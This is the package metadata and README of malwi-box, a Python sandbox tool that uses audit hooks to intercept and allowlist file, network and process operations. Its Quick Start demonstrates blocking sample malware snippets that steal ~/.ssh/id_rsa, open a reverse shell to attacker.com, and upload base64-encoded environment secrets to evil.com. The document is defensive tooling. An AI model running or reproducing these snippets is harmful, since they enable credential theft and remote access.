Metadata-Version: 2.4
Name: malwi-box
Version: 0.0.19
Summary: Intercept, audit, and block critical Python operations at runtime
License: # License
        
        Portions of this software are licensed as follows:
        
        - Content of branches other than the main branch (i.e. "development") are not licensed.
        - All third party components incorporated into the malwi-box software are licensed under the original license
          provided by the owner of the applicable component.
        - Content outside of the above mentioned restrictions is available under the "Sustainable Use License" as defined below.
        
        ## Sustainable Use License
        
        Version 1.0
        
        ### Acceptance
        
        By using the software, you agree to all of the terms and conditions below.
        
        ### Copyright License
        
        The licensor grants you a non-exclusive, royalty-free, worldwide, non-sublicensable, non-transferable license
        to use, copy, distribute, make available, and prepare derivative works of the software, in each case subject
        to the limitations below.
        
        ### Limitations
        
        You may use or modify the software only for your own internal business purposes or for non-commercial or
        personal use. You may distribute the software or provide it to others only if you do so free of charge for
        non-commercial purposes. You may not alter, remove, or obscure any licensing, copyright, or other notices of
        the licensor in the software. Any use of the licensor's trademarks is subject to applicable law.
        
        ### Patents
        
        The licensor grants you a license, under any patent claims the licensor can license, or becomes able to
        license, to make, have made, use, sell, offer for sale, import and have imported the software, in each case
        subject to the limitations and conditions in this license. This license does not cover any patent claims that
        you cause to be infringed by modifications or additions to the software. If you or your company make any
        written claim that the software infringes or contributes to infringement of any patent, your patent license
        for the software granted under these terms ends immediately. If your company makes such a claim, your patent
        license ends immediately for work on behalf of your company.
        
        ### Notices
        
        You must ensure that anyone who gets a copy of any part of the software from you also gets a copy of these
        terms. If you modify the software, you must include in any modified copies of the software a prominent notice
        stating that you have modified the software.
        
        ### No Other Rights
        
        These terms do not imply any licenses other than those expressly granted in these terms.
        
        ### Termination
        
        If you use the software in violation of these terms, such use is not licensed, and your license will
        automatically terminate. If the licensor provides you with a notice of your violation, and you cease all
        violation of this license no later than 30 days after you receive that notice, your license will be reinstated
        retroactively. However, if you violate these terms after such reinstatement, any additional violation of these
        terms will cause your license to terminate automatically and permanently.
        
        ### No Liability
        
        As far as the law allows, the software comes as is, without any warranty or condition, and the licensor will
        not be liable to you for any damages arising out of these terms or the use or nature of the software, under
        any kind of legal claim.
        
        ### Definitions
        
        The "licensor" is the entity offering these terms.
        
        The "software" is the software the licensor makes available under these terms, including any portion of it.
        
        "You" refers to the individual or entity agreeing to these terms.
        
        "Your company" is any legal entity, sole proprietorship, or other kind of organization that you work for, plus
        all organizations that have control over, are under the control of, or are under common control with that
        organization. Control means ownership of substantially all the assets of an entity, or the power to direct its
        management and policies by vote, contract, or otherwise. Control can be direct or indirect.
        
        "Your license" is the license granted to you for the software under these terms.
        
        "Use" means anything you do with the software requiring your license.
        
        "Trademark" means trademarks, service marks, and similar rights.
Project-URL: Homepage, https://github.com/canvascomputing/malwi-box
Project-URL: Repository, https://github.com/canvascomputing/malwi-box
Keywords: security,audit,sandbox,malware,python
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Topic :: Security
Requires-Python: >=3.10
Description-Content-Type: text/markdown
License-File: LICENSE.md
Requires-Dist: pip
Dynamic: license-file

<p align="center">
  <img src="malwi-box.png" alt="malwi-box logo" width="200">
</p>

<h1 align="center">malwi-box</h1>

<p align="center">
  <strong>Intercept, audit, and block critical Python operations at runtime.</strong>
</p>

<p align="center">
  <em>Shipped without any dependencies, except pip</em>
</p>

<p align="center">
  <img src="malwi-box.svg" alt="malwi-box demo" width="600">
</p>

## Use Cases

- 🔬 **Malware analysis** - Safely detonate suspicious Python code and observe its behavior
- 📦 **Dependency auditing** - Discover what file, network, and process access a package actually needs
- 🔒 **Runtime protection** - Enforce allowlists to block unauthorized operations in production

> **Warning**: This tool is not executed in isolation or virtualization, it runs on your actual machine, kernel and CPU. Use it at your own risk. Still it allows to reduce the blast radius of typical Python malware.

## Installation

```bash
pip install malwi-box
```

Or with uv:
```bash
uv tool install malwi-box
```

## Quick Start

**Credential theft** - Malware reads SSH keys and sends them to attacker:
```bash
$ malwi-box eval --review "
import os, urllib.request
key = open(os.path.expanduser('~/.ssh/id_rsa')).read()
urllib.request.urlopen('https://evil.com/steal', key.encode())
"
[malwi-box] Read file: /Users/you/.ssh/id_rsa
Approve? [Y/n/i]: n
Denied
```

**Reverse shell** - Malware connects to attacker's C2 server:
```bash
$ malwi-box eval --review "
import socket, subprocess
s = socket.socket()
s.connect(('attacker.com', 4444))
subprocess.call(['/bin/sh', '-i'], stdin=s.fileno(), stdout=s.fileno())
"
[malwi-box] Connect: attacker.com:4444
Approve? [Y/n/i]: n
Denied
```

**Data exfiltration** - Malware encodes and uploads environment secrets:
```bash
$ malwi-box eval --review "
import os, base64, urllib.request
secrets = base64.b64encode(str(os.environ).encode())
urllib.request.urlopen('https://evil.com/upload', secrets)
"
[malwi-box] Base64: b64encode (<string>:3)
[malwi-box] HTTP POST: https://evil.com/upload
Approve? [Y/n/i]: n
Denied
```

## Commands

### run

Run a Python script or module with sandboxing.

```bash
malwi-box run script.py [args...]
malwi-box run --force script.py     # log violations without blocking
malwi-box run --review script.py    # approve/deny each operation
```

### eval

Execute a Python code string with sandboxing.

```bash
malwi-box eval "print('hello')"
malwi-box eval --force "import os; os.system('id')"
malwi-box eval --review "open('/etc/passwd').read()"
```

### pip install

Install pip packages with sandboxing. Most malware packages perform malicious activities at install-time.

```bash
malwi-box pip install package
malwi-box pip install package --version 1.2.3
malwi-box pip install -r requirements.txt
malwi-box pip install --review package # approve/deny each operation
```

### venv

Create a sandboxed virtual environment. The venv's Python binaries are replaced with the malwi-box wrapper, so all code executed in the venv is automatically sandboxed.

```bash
malwi-box venv                    # creates .venv
malwi-box venv --path myenv       # custom path
```

After creation, activate and use normally:
```bash
source .venv/bin/activate
python script.py                  # sandboxed automatically
pip install requests              # install scripts are sandboxed
```

Or run code directly without activating:
```bash
$ .venv/bin/python -c "import socket; socket.socket().connect(('evil.com', 80))"
[malwi-box] Blocked: Connect: evil.com:80
```

**Environment variables** for controlling the sandbox:

| Variable | Description |
|----------|-------------|
| `MALWI_BOX_ENABLED=0` | Disable sandbox |
| `MALWI_BOX_MODE=review` | Interactive approval mode |
| `MALWI_BOX_MODE=force` | Log violations without blocking |
| `MALWI_BOX_CONFIG=<path>` | Path to config file (default: `.malwi-box.toml`) |

```bash
MALWI_BOX_MODE=review python script.py   # interactive mode
MALWI_BOX_ENABLED=0 python script.py     # disable sandbox
```

### config

Manage configuration.

```bash
malwi-box config create # creates .malwi-box.toml
malwi-box config create --path FILE
```

## Configuration Reference

Config file: `.malwi-box.toml`

```toml
# File access permissions
allow_read = [
  "$PWD",                     # working directory
  "$PYTHON_STDLIB",           # Python standard library
  "$PYTHON_SITE_PACKAGES",    # installed packages
  "$HOME/.config/myapp",      # specific config directory
  "/etc/hosts",               # specific file
]

allow_create = [
  "$PWD",                     # allow creating files in workdir
  "$TMPDIR",                  # allow temp files
]

allow_modify = [
  "$PWD/data",                # only modify files in data/
  { path = "/etc/myapp.conf", hash = "sha256:abc123..." },
]

allow_delete = [
  "$TMPDIR",                  # allow temp cleanup
  "$PIP_CACHE",               # allow pip cache cleanup
]

# Network permissions
allow_domains = [
  "pypi.org",                 # allow any port
  "files.pythonhosted.org",
  "api.example.com:443",      # restrict to specific port
]

allow_ips = [
  "10.0.0.0/8",               # CIDR notation
  "192.168.1.100:8080",       # specific IP:port
  "[::1]:443",                # IPv6 with port
]

# HTTP URL path restrictions (empty = block all)
allow_http_urls = [
  "$PYPI_DOMAINS/*",              # use variable for PyPI URLs
  "api.example.com/v1/*",         # glob pattern for paths
  "cdn.example.com/assets/*",
  "https://secure.example.com/*", # explicit scheme
]

# HTTP methods allowed (empty = block all)
allow_http_methods = ["$ALL_HTTP_METHODS"]  # variable for all standard methods

# Raw socket access (default: false, blocks SOCK_RAW creation)
allow_raw_sockets = false

# Process execution
allow_executables = [
  "/usr/bin/git",             # allow by path
  "$PWD/.venv/bin/*",         # glob pattern
  { path = "/usr/bin/curl", hash = "sha256:abc123..." },
]

allow_shell_commands = [
  "/usr/bin/git *",           # glob pattern matching
  "/usr/bin/curl *",
]

# Environment variables (empty = block all)
allow_env_var_reads = ["$SAFE_ENV_VARS"]  # variable for safe env vars
```

### Variables

Variables can be used in config values and are expanded at runtime.

| Variable | Expands To |
|----------|------------|
| **Path variables** | |
| `$PWD` | Working directory |
| `$HOME` | User home directory |
| `$TMPDIR` | System temp directory (macOS: `/var/folders/.../T`, Linux: `/tmp`) |
| `$CACHE_HOME` | User cache directory (macOS: `~/Library/Caches`, Linux: `~/.cache`) |
| `$PIP_CACHE` | pip cache directory |
| `$VENV` | Active virtualenv root (if `$VIRTUAL_ENV` is set) |
| `$PYTHON_STDLIB` | Python standard library |
| `$PYTHON_SITE_PACKAGES` | Installed packages (purelib) |
| `$PYTHON_PLATLIB` | Platform-specific packages |
| `$PYTHON_USER_SITE` | User site-packages (`~/.local/lib/pythonX.Y/site-packages`) |
| `$PYTHON_PREFIX` | Python installation prefix |
| **List variables** | *Expand to multiple values* |
| `$PYPI_DOMAINS` | `pypi.org`, `files.pythonhosted.org` |
| `$LOCALHOST` | `127.0.0.1`, `::1`, `localhost` |
| `$ALL_HTTP_METHODS` | `GET`, `POST`, `PUT`, `DELETE`, `PATCH`, `HEAD`, `OPTIONS` |
| `$SAFE_ENV_VARS` | `PATH`, `HOME`, `USER`, `SHELL`, `TERM`, `LANG`, `LC_ALL`, `LC_CTYPE`, `PWD`, `OLDPWD`, `TMPDIR`, `TMP`, `TEMP`, `PYTHONPATH`, `VIRTUAL_ENV`, `CONDA_PREFIX`, `SOURCE_DATE_EPOCH` |
| `$OS_SYSTEM` | OS system paths (macOS: `/System`, `/Library`, `/usr/lib`, `/usr/share`; Linux: `/usr/lib`, `/usr/share`, `/lib`, `/lib64`) |

List variables can be combined with patterns: `$PYPI_DOMAINS/*` expands to `pypi.org/*`, `files.pythonhosted.org/*`.

### Allowlist Behavior
All `allow_*` attributes consistently block when empty. Use variables to document what's being allowed:

| Attribute | Empty Behavior | Default |
|-----------|---------------|---------|
| `allow_read` | Block all | `$PWD`, `$PYTHON_PREFIX`, `$PYTHON_STDLIB`, `$PYTHON_SITE_PACKAGES`, `$PYTHON_PLATLIB`, `$PYTHON_USER_SITE`, `$PIP_CACHE`, `$TMPDIR`, `$CACHE_HOME`, `$OS_SYSTEM` |
| `allow_create` | Block all | `$PWD`, `$TMPDIR`, `$PIP_CACHE`, `$PYTHON_USER_SITE`, `$PYTHON_SITE_PACKAGES` |
| `allow_modify` | Block all | `$TMPDIR`, `$PIP_CACHE`, `$PYTHON_USER_SITE`, `$PYTHON_SITE_PACKAGES` |
| `allow_delete` | Block all | `$PWD`, `$TMPDIR`, `$PIP_CACHE`, `$PYTHON_USER_SITE`, `$PYTHON_SITE_PACKAGES` |
| `allow_domains` | Block all | `$PYPI_DOMAINS` |
| `allow_ips` | Block all | `$LOCALHOST` |
| `allow_http_urls` | Block all | `$PYPI_DOMAINS/*` |
| `allow_http_methods` | Block all | `$ALL_HTTP_METHODS` |
| `allow_executables` | Block all | (none) |
| `allow_shell_commands` | Block all | (none) |
| `allow_env_var_reads` | Block all | `$SAFE_ENV_VARS` |

### Network Behavior
- Domains in `allow_domains` automatically permit their resolved IPs
- Direct IP access requires explicit `allow_ips` entries
- CIDR notation supported for IP ranges
- Port restrictions supported for both domains and IPs

### HTTP Request Interception

Supported libraries:
- `urllib.request` (stdlib)
- `http.client` (stdlib)
- `urllib3`
- `requests`
- `httpx`
- `aiohttp`

**URL allowlisting:**
- If `allow_http_urls` is empty, all HTTP requests are blocked
- Default uses `$PYPI_DOMAINS/*` to allow pip install
- Requests must match both domain AND URL pattern
- Scheme (`http://`, `https://`) is optional in patterns - omit to match both
- Glob patterns supported for paths: `api.example.com/v1/*`
- Subdomain matching: `example.com/api/*` matches `api.example.com/api/*`

**Method restrictions:**
- If `allow_http_methods` is empty, all HTTP requests are blocked
- Default uses `$ALL_HTTP_METHODS` to allow all standard methods
- If configured, only listed methods are permitted (e.g., `["GET", "HEAD"]`)

**Bypass note:** Raw socket HTTP requests bypass library hooks but are blocked by default (`allow_raw_sockets = false`). The `socket.connect` event still captures all connections at the network level.

### Hash Verification
Executables and files can include SHA256 hashes:
```toml
allow_executables = [
  { path = "/usr/bin/git", hash = "sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" },
]
```

## Information Events

Some operations are logged for auditing but never blocked. They help identify potentially suspicious behavior during program analysis:

| Event | Description | Example Output | Malware Indicator |
|-------|-------------|----------------|-------------------|
| `encoding.base64` | Base64 encode/decode | `Base64: b64encode` | Payload obfuscation |
| `encoding.hex` | Hex encode/decode | `Hex: hexlify` | Payload obfuscation |
| `encoding.zlib` | zlib compress/decompress | `Zlib: compress` | Packed payloads |
| `encoding.gzip` | gzip compress/decompress | `Gzip: compress` | Packed payloads |
| `encoding.bz2` | bz2 compress/decompress | `Bz2: compress` | Packed payloads |
| `encoding.lzma` | lzma/xz compress/decompress | `LZMA: compress` | Packed payloads |
| `crypto.cipher` | Low-level cipher ops | `Cipher: Encrypt` | Generic encryption |
| `crypto.fernet` | Fernet encryption | `Fernet: encrypt` | Symmetric encryption |
| `crypto.hmac` | HMAC keyed hashing | `HMAC: new` | C2 authentication |
| `crypto.rsa` | RSA key operations | `RSA: generate (2048 bits)` | Ransomware key exchange |
| `crypto.aes` | AES encryption | `AES: init (CBC)` | File encryption |
| `crypto.chacha20` | ChaCha20 encryption | `ChaCha20: init` | Modern symmetric encryption |
| `secrets.token` | Secure token generation | `SecureRandom: 32 bytes` | Key generation |
| `pickle.find_class` | Class during unpickling | `Pickle: builtins.list` | Code execution |
| `marshal.loads` | Loading bytecode | `Marshal: loads` | Bytecode injection |
| `shutil.unpack_archive` | Archive extraction | `Unpack: file.zip -> /tmp` | Zip bombs, path traversal |
| `os.putenv` | Set environment variable | `Set env var: PATH=/tmp` | Env manipulation |
| `os.unsetenv` | Unset environment variable | `Unset env var: DEBUG` | Env manipulation |


## Bypass Protection

- Blocks `sys.addaudithook` to prevent registering competing hooks
- Blocks `sys.settrace` and `sys.setprofile` to prevent debugger-based evasion
- Blocks `ctypes.dlopen` by default to prevent loading native code that bypasses hooks

## Limitations

- Audit hooks cannot be bypassed from Python, but native code can
- Here it is important to review which executables are allow-listed
